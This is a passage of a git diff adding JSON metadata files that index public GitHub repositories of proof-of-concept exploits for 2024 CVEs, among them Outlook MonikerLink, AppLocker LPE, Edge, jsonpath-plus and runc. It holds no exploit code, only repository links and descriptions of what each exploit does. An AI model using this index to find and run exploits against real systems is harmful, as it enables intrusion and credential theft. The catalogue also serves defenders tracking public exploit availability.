+ "description": null, + "fork": false, + "created_at": "2024-06-23T06:03:44Z", + "updated_at": "2024-12-24T15:11:57Z", + "pushed_at": "2024-06-23T06:09:10Z", + "stargazers_count": 38, + "watchers_count": 38, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 38, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 835255581, + "name": "CVE-2024-21338", + "full_name": "Crowdfense\/CVE-2024-21338", + "owner": { + "login": "Crowdfense", + "id": 176018566, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/176018566?v=4", + "html_url": "https:\/\/github.com\/Crowdfense", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Crowdfense\/CVE-2024-21338", + "description": "Windows AppLocker Driver (appid.sys) LPE", + "fork": false, + "created_at": "2024-07-29T13:18:06Z", + "updated_at": "2025-01-07T15:13:48Z", + "pushed_at": "2024-07-29T13:29:59Z", + "stargazers_count": 46, + "watchers_count": 46, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploit", + "kernel", + "lpe", + "windowd" + ], + "visibility": "public", + "forks": 13, + "watchers": 46, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-21345.json b/2024/CVE-2024-21345.json new file mode 100644 index 0000000000..5ce967b02e --- /dev/null +++ b/2024/CVE-2024-21345.json @@ -0,0 +1,64 @@ +[ + { + "id": 792426232, + "name": "CVE-2024-21345", + "full_name": "exploits-forsale\/CVE-2024-21345", + "owner": { + "login": "exploits-forsale", + "id": 168065072, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/168065072?v=4", + "html_url": "https:\/\/github.com\/exploits-forsale", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/exploits-forsale\/CVE-2024-21345", + "description": "Proof-of-Concept for CVE-2024-21345", + "fork": false, + "created_at": "2024-04-26T16:38:17Z", + "updated_at": "2024-12-30T13:28:54Z", + "pushed_at": "2024-04-26T16:39:48Z", + "stargazers_count": 70, + "watchers_count": 70, + "has_discussions": false, + "forks_count": 20, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 20, + "watchers": 70, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 793265049, + "name": "CVE-2024-21345", + "full_name": "FoxyProxys\/CVE-2024-21345", + "owner": { + "login": "FoxyProxys", + "id": 166161106, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/166161106?v=4", + "html_url": "https:\/\/github.com\/FoxyProxys", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FoxyProxys\/CVE-2024-21345", + "description": null, + "fork": false, + "created_at": "2024-04-28T21:36:33Z", + "updated_at": "2024-04-28T21:44:18Z", + "pushed_at": "2024-04-28T21:44:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-21378.json b/2024/CVE-2024-21378.json new file mode 100644 index 0000000000..f530ba01ef --- /dev/null +++ b/2024/CVE-2024-21378.json @@ -0,0 +1,33 @@ +[ + { + "id": 770999935, + "name": "CVE-2024-21378", + "full_name": "d0rb\/CVE-2024-21378", + "owner": { + "login": "d0rb", + "id": 10403781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10403781?v=4", + "html_url": "https:\/\/github.com\/d0rb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d0rb\/CVE-2024-21378", + "description": "This repository contains an exploit for targeting Microsoft Outlook through Exchange Online, leveraging a vulnerability to execute arbitrary code via COM DLLs. The exploit utilizes a modified version of Ruler to send a malicious form as an email, triggering the execution upon user interaction within the Outlook thick client.", + "fork": false, + "created_at": "2024-03-12T14:11:58Z", + "updated_at": "2024-11-20T12:18:21Z", + "pushed_at": "2024-03-13T18:34:57Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-21388.json b/2024/CVE-2024-21388.json new file mode 100644 index 0000000000..3184f65508 --- /dev/null +++ b/2024/CVE-2024-21388.json @@ -0,0 +1,33 @@ +[ + { + "id": 778727781, + "name": "CVE-2024-21388", + "full_name": "d0rb\/CVE-2024-21388", + "owner": { + "login": "d0rb", + "id": 10403781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10403781?v=4", + "html_url": "https:\/\/github.com\/d0rb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d0rb\/CVE-2024-21388", + "description": "This Python script exploits a vulnerability (CVE-2024-21388) in Microsoft Edge, allowing silent installation of browser extensions with elevated privileges via a private API.", + "fork": false, + "created_at": "2024-03-28T09:31:31Z", + "updated_at": "2024-12-28T18:54:12Z", + "pushed_at": "2024-03-28T09:33:23Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-21412.json b/2024/CVE-2024-21412.json new file mode 100644 index 0000000000..3b499dc152 --- /dev/null +++ b/2024/CVE-2024-21412.json @@ -0,0 +1,38 @@ +[ + { + "id": 775557259, + "name": "CVE-2024-21412_Water-Hydra", + "full_name": "lsr00ter\/CVE-2024-21412_Water-Hydra", + "owner": { + "login": "lsr00ter", + "id": 3685107, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3685107?v=4", + "html_url": "https:\/\/github.com\/lsr00ter", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lsr00ter\/CVE-2024-21412_Water-Hydra", + "description": "POC code according to trendmicro's research", + "fork": false, + "created_at": "2024-03-21T15:57:51Z", + "updated_at": "2024-08-16T04:58:26Z", + "pushed_at": "2024-03-21T16:02:54Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "initial-access", + "malware", + "redteam", + "windows" + ], + "visibility": "public", + "forks": 3, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-21413.json b/2024/CVE-2024-21413.json new file mode 100644 index 0000000000..25688d0413 --- /dev/null +++ b/2024/CVE-2024-21413.json @@ -0,0 +1,507 @@ +[ + { + "id": 758191027, + "name": "CVE-2024-21413", + "full_name": "duy-31\/CVE-2024-21413", + "owner": { + "login": "duy-31", + "id": 20819326, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20819326?v=4", + "html_url": "https:\/\/github.com\/duy-31", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/duy-31\/CVE-2024-21413", + "description": "Microsoft Outlook Information Disclosure Vulnerability (leak password hash) - Expect Script POC", + "fork": false, + "created_at": "2024-02-15T19:57:38Z", + "updated_at": "2024-12-10T06:03:40Z", + "pushed_at": "2024-02-17T07:08:49Z", + "stargazers_count": 155, + "watchers_count": 155, + "has_discussions": false, + "forks_count": 32, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 32, + "watchers": 155, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 758555813, + "name": "CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability", + "full_name": "xaitax\/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability", + "owner": { + "login": "xaitax", + "id": 5014849, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5014849?v=4", + "html_url": "https:\/\/github.com\/xaitax", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xaitax\/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability", + "description": "Microsoft-Outlook-Remote-Code-Execution-Vulnerability", + "fork": false, + "created_at": "2024-02-16T15:17:59Z", + "updated_at": "2024-12-19T12:52:26Z", + "pushed_at": "2024-02-19T20:00:35Z", + "stargazers_count": 710, + "watchers_count": 710, + "has_discussions": false, + "forks_count": 155, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 155, + "watchers": 710, + "score": 0, + "subscribers_count": 10 + }, + { + "id": 758688293, + "name": "CVE-2024-21413-POC", + "full_name": "r00tb1t\/CVE-2024-21413-POC", + "owner": { + "login": "r00tb1t", + "id": 150359865, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/150359865?v=4", + "html_url": "https:\/\/github.com\/r00tb1t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r00tb1t\/CVE-2024-21413-POC", + "description": "Microsoft Outlook Information Disclosure Vulnerability (leak password hash) - CVE-2024-21413 POC", + "fork": false, + "created_at": "2024-02-16T21:10:31Z", + "updated_at": "2024-07-23T13:37:41Z", + "pushed_at": "2024-02-16T22:23:37Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 16, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 758949379, + "name": "CVE-2024-21413", + "full_name": "CMNatic\/CVE-2024-21413", + "owner": { + "login": "CMNatic", + "id": 4163116, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4163116?v=4", + "html_url": "https:\/\/github.com\/CMNatic", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CMNatic\/CVE-2024-21413", + "description": "CVE-2024-21413 PoC for THM Lab", + "fork": false, + "created_at": "2024-02-17T14:52:52Z", + "updated_at": "2025-01-03T18:59:22Z", + "pushed_at": "2024-03-13T02:44:28Z", + "stargazers_count": 60, + "watchers_count": 60, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 60, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 759610035, + "name": "CVE-2024-21413", + "full_name": "MSeymenD\/CVE-2024-21413", + "owner": { + "login": "MSeymenD", + "id": 83572774, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83572774?v=4", + "html_url": "https:\/\/github.com\/MSeymenD", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MSeymenD\/CVE-2024-21413", + "description": "CVE-2024-21413 Açığını Kullanarak Giriş Bilgilerini Alma", + "fork": false, + "created_at": "2024-02-19T01:37:15Z", + "updated_at": "2024-02-19T01:48:46Z", + "pushed_at": "2024-02-19T01:54:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 760445057, + "name": "CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability", + "full_name": "Mdusmandasthaheer\/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability", + "owner": { + "login": "Mdusmandasthaheer", + "id": 122736342, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122736342?v=4", + "html_url": "https:\/\/github.com\/Mdusmandasthaheer", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mdusmandasthaheer\/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability", + "description": null, + "fork": false, + "created_at": "2024-02-20T12:41:15Z", + "updated_at": "2024-10-18T18:45:47Z", + "pushed_at": "2024-02-20T13:37:39Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 762261193, + "name": "CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability", + "full_name": "ahmetkarakayaoffical\/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability", + "owner": { + "login": "ahmetkarakayaoffical", + "id": 100443477, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100443477?v=4", + "html_url": "https:\/\/github.com\/ahmetkarakayaoffical", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ahmetkarakayaoffical\/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability", + "description": "Bu betik, Microsoft Outlook'ta keşfedilen ve CVSS değeri 9.8 olan önemli bir güvenlik açığı olan CVE-2024-21413 için bir kavram kanıtı (PoC) sunmaktadır. MonikerLink hatası olarak adlandırılan bu güvenlik açığı, yerel NTLM bilgilerinin potansiyel sızıntısı ve uzaktan kod çalıştırma olasılığı dahil olmak üzere geniş kapsamlı etkilere sahiptir.", + "fork": false, + "created_at": "2024-02-23T12:13:11Z", + "updated_at": "2025-01-06T00:08:37Z", + "pushed_at": "2024-02-24T15:36:22Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 765116138, + "name": "CVE-2024-21413", + "full_name": "dshabani96\/CVE-2024-21413", + "owner": { + "login": "dshabani96", + "id": 107131685, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/107131685?v=4", + "html_url": "https:\/\/github.com\/dshabani96", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dshabani96\/CVE-2024-21413", + "description": null, + "fork": false, + "created_at": "2024-02-29T10:07:34Z", + "updated_at": "2024-03-13T04:12:36Z", + "pushed_at": "2024-02-29T13:22:17Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 795596778, + "name": "CVE-2024-21413-Microsoft-Outlook-RCE-Exploit", + "full_name": "X-Projetion\/CVE-2024-21413-Microsoft-Outlook-RCE-Exploit", + "owner": { + "login": "X-Projetion", + "id": 161194427, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/161194427?v=4", + "html_url": "https:\/\/github.com\/X-Projetion", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/X-Projetion\/CVE-2024-21413-Microsoft-Outlook-RCE-Exploit", + "description": "CVE-2024-21413 Microsoft Outlook RCE Exploit", + "fork": false, + "created_at": "2024-05-03T16:09:54Z", + "updated_at": "2024-11-06T05:33:54Z", + "pushed_at": "2024-05-03T16:11:46Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 799194864, + "name": "CVE-2024-21413", + "full_name": "th3Hellion\/CVE-2024-21413", + "owner": { + "login": "th3Hellion", + "id": 93284551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93284551?v=4", + "html_url": "https:\/\/github.com\/th3Hellion", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/th3Hellion\/CVE-2024-21413", + "description": null, + "fork": false, + "created_at": "2024-05-11T12:28:22Z", + "updated_at": "2024-05-11T12:34:27Z", + "pushed_at": "2024-05-11T12:34:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 816689478, + "name": "CVE-2024-21413", + "full_name": "ShubhamKanhere307\/CVE-2024-21413", + "owner": { + "login": "ShubhamKanhere307", + "id": 173140854, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/173140854?v=4", + "html_url": "https:\/\/github.com\/ShubhamKanhere307", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ShubhamKanhere307\/CVE-2024-21413", + "description": "This script is the Proof of Concept (PoC) of the CVE-2024-21413, a significant security vulnerability discovered in the Microsoft Windows Outlook having a strong 9.8 critical CVSS score. Named as #MonikerLink Bug, this vulnerability allows the attacker to execute the arbitrary code remotely on the victim's machine, thus becomes a full-fledged RCE. ", + "fork": false, + "created_at": "2024-06-18T08:11:33Z", + "updated_at": "2024-06-18T08:18:16Z", + "pushed_at": "2024-06-18T08:18:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 821343809, + "name": "CVE-2024-21413", + "full_name": "olebris\/CVE-2024-21413", + "owner": { + "login": "olebris", + "id": 78493240, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78493240?v=4", + "html_url": "https:\/\/github.com\/olebris", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/olebris\/CVE-2024-21413", + "description": "CVE-2024-21413 PoC", + "fork": false, + "created_at": "2024-06-28T10:27:34Z", + "updated_at": "2024-06-28T10:27:55Z", + "pushed_at": "2024-06-28T10:27:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 822078685, + "name": "CVE-2024-21413", + "full_name": "DerZiad\/CVE-2024-21413", + "owner": { + "login": "DerZiad", + "id": 40337316, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40337316?v=4", + "html_url": "https:\/\/github.com\/DerZiad", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DerZiad\/CVE-2024-21413", + "description": "This is a mailer that use console prompt to exploit this vulnerability", + "fork": false, + "created_at": "2024-06-30T08:53:46Z", + "updated_at": "2025-01-01T07:17:19Z", + "pushed_at": "2024-06-30T11:10:05Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": true, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823551343, + "name": "Unveiling-Moniker-Link-CVE-2024-21413-Navigating-the-Latest-Cybersecurity-Landscape", + "full_name": "Redfox-Secuirty\/Unveiling-Moniker-Link-CVE-2024-21413-Navigating-the-Latest-Cybersecurity-Landscape", + "owner": { + "login": "Redfox-Secuirty", + "id": 173128884, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/173128884?v=4", + "html_url": "https:\/\/github.com\/Redfox-Secuirty", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Redfox-Secuirty\/Unveiling-Moniker-Link-CVE-2024-21413-Navigating-the-Latest-Cybersecurity-Landscape", + "description": null, + "fork": false, + "created_at": "2024-07-03T08:45:05Z", + "updated_at": "2024-07-03T08:45:08Z", + "pushed_at": "2024-07-03T08:45:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 850327133, + "name": "CVE-2024-21413", + "full_name": "ThemeHackers\/CVE-2024-21413", + "owner": { + "login": "ThemeHackers", + "id": 107047730, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/107047730?v=4", + "html_url": "https:\/\/github.com\/ThemeHackers", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ThemeHackers\/CVE-2024-21413", + "description": "CVE-2024-21413 | Microsoft Outlook Remote Code Execution Vulnerability PoC", + "fork": false, + "created_at": "2024-08-31T13:18:43Z", + "updated_at": "2024-12-18T01:20:02Z", + "pushed_at": "2024-12-15T05:47:04Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 898401287, + "name": "CVE-2024-21413-Vulnerabilidad-Outlook-LAB", + "full_name": "D1se0\/CVE-2024-21413-Vulnerabilidad-Outlook-LAB", + "owner": { + "login": "D1se0", + "id": 164921056, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/164921056?v=4", + "html_url": "https:\/\/github.com\/D1se0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/D1se0\/CVE-2024-21413-Vulnerabilidad-Outlook-LAB", + "description": null, + "fork": false, + "created_at": "2024-12-04T10:26:37Z", + "updated_at": "2024-12-05T09:51:00Z", + "pushed_at": "2024-12-05T09:50:57Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cibersecurity", + "cve", + "cve-2024-21413", + "exploit", + "hacking", + "hacking-etico", + "lab", + "outlook" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-21514.json b/2024/CVE-2024-21514.json new file mode 100644 index 0000000000..f47d8a0735 --- /dev/null +++ b/2024/CVE-2024-21514.json @@ -0,0 +1,33 @@ +[ + { + "id": 818819540, + "name": "CVE-2024-21514", + "full_name": "bigb0x\/CVE-2024-21514", + "owner": { + "login": "bigb0x", + "id": 13532434, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13532434?v=4", + "html_url": "https:\/\/github.com\/bigb0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bigb0x\/CVE-2024-21514", + "description": "SQL Injection POC for CVE-2024-21514: Divido payment extension for OpenCart", + "fork": false, + "created_at": "2024-06-23T00:55:00Z", + "updated_at": "2024-06-26T04:27:50Z", + "pushed_at": "2024-06-23T01:08:17Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-21520.json b/2024/CVE-2024-21520.json new file mode 100644 index 0000000000..15c45e1e62 --- /dev/null +++ b/2024/CVE-2024-21520.json @@ -0,0 +1,33 @@ +[ + { + "id": 805957479, + "name": "CVE-2024-21520-Demo", + "full_name": "ch4n3-yoon\/CVE-2024-21520-Demo", + "owner": { + "login": "ch4n3-yoon", + "id": 13852925, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13852925?v=4", + "html_url": "https:\/\/github.com\/ch4n3-yoon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ch4n3-yoon\/CVE-2024-21520-Demo", + "description": "A demonstration of common XSS vulnerabilities in Django Rest Framework applications. This repository showcases intentionally vulnerable code to educate developers on identifying and mitigating XSS attacks in DRF-based projects. For educational purposes only.", + "fork": false, + "created_at": "2024-05-26T00:30:12Z", + "updated_at": "2024-07-13T03:42:36Z", + "pushed_at": "2024-05-26T01:04:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-21534.json b/2024/CVE-2024-21534.json new file mode 100644 index 0000000000..c1ec8a854a --- /dev/null +++ b/2024/CVE-2024-21534.json @@ -0,0 +1,106 @@ +[ + { + "id": 887743822, + "name": "CVE-2024-21534", + "full_name": "pabloopez\/CVE-2024-21534", + "owner": { + "login": "pabloopez", + "id": 56795889, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56795889?v=4", + "html_url": "https:\/\/github.com\/pabloopez", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pabloopez\/CVE-2024-21534", + "description": "Proof-of-concept (PoC) exploit for JSONPath-plus vulnerability", + "fork": false, + "created_at": "2024-11-13T07:56:10Z", + "updated_at": "2024-11-27T08:01:39Z", + "pushed_at": "2024-11-27T08:01:35Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 892949211, + "name": "cve-2024-21534-poc", + "full_name": "XiaomingX\/cve-2024-21534-poc", + "owner": { + "login": "XiaomingX", + "id": 5387930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5387930?v=4", + "html_url": "https:\/\/github.com\/XiaomingX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XiaomingX\/cve-2024-21534-poc", + "description": "jsonpath-plus 包(版本 <=10.0.7)存在严重的远程代码执行(RCE)漏洞,允许攻击者通过 Node.js 的 VM 模块执行任意代码。该漏洞由于输入验证不严格导致,影响版本为 10.0.7 以下,CVSS 分数为 9.8(极其严重)。漏洞首次公开于 2024 年 10 月 11 日。", + "fork": false, + "created_at": "2024-11-23T05:54:24Z", + "updated_at": "2024-12-08T18:36:54Z", + "pushed_at": "2024-11-23T05:57:35Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exp", + "poc", + "rce" + ], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 895697212, + "name": "cve-2024-21534", + "full_name": "verylazytech\/cve-2024-21534", + "owner": { + "login": "verylazytech", + "id": 172168670, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/172168670?v=4", + "html_url": "https:\/\/github.com\/verylazytech", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/verylazytech\/cve-2024-21534", + "description": "POC - CVE-2024-21534 Jsonpath-plus vulnerable to Remote Code Execution (RCE) due to improper input sanitization", + "fork": false, + "created_at": "2024-11-28T17:47:53Z", + "updated_at": "2024-12-01T14:49:28Z", + "pushed_at": "2024-11-28T18:07:14Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-21534", + "jsonpath", + "rce", + "rce-exploit", + "remote-code-execution", + "sanitization" + ], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-21542.json b/2024/CVE-2024-21542.json new file mode 100644 index 0000000000..5d1121477b --- /dev/null +++ b/2024/CVE-2024-21542.json @@ -0,0 +1,33 @@ +[ + { + "id": 903920080, + "name": "Poc-CVE-2024-21542", + "full_name": "L3ster1337\/Poc-CVE-2024-21542", + "owner": { + "login": "L3ster1337", + "id": 44538226, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44538226?v=4", + "html_url": "https:\/\/github.com\/L3ster1337", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/L3ster1337\/Poc-CVE-2024-21542", + "description": null, + "fork": false, + "created_at": "2024-12-15T22:17:15Z", + "updated_at": "2024-12-16T01:29:20Z", + "pushed_at": "2024-12-15T22:32:58Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-21626.json b/2024/CVE-2024-21626.json new file mode 100644 index 0000000000..42cc90b20d --- /dev/null +++ b/2024/CVE-2024-21626.json @@ -0,0 +1,436 @@ +[ + { + "id": 751354058, + "name": "CVE-2024-21626-POC", + "full_name": "zpxlz\/CVE-2024-21626-POC", + "owner": { + "login": "zpxlz", + "id": 89461075, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89461075?v=4", + "html_url": "https:\/\/github.com\/zpxlz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zpxlz\/CVE-2024-21626-POC", + "description": null, + "fork": false, + "created_at": "2024-02-01T12:53:18Z", + "updated_at": "2024-02-02T09:26:46Z", + "pushed_at": "2024-02-01T20:19:03Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 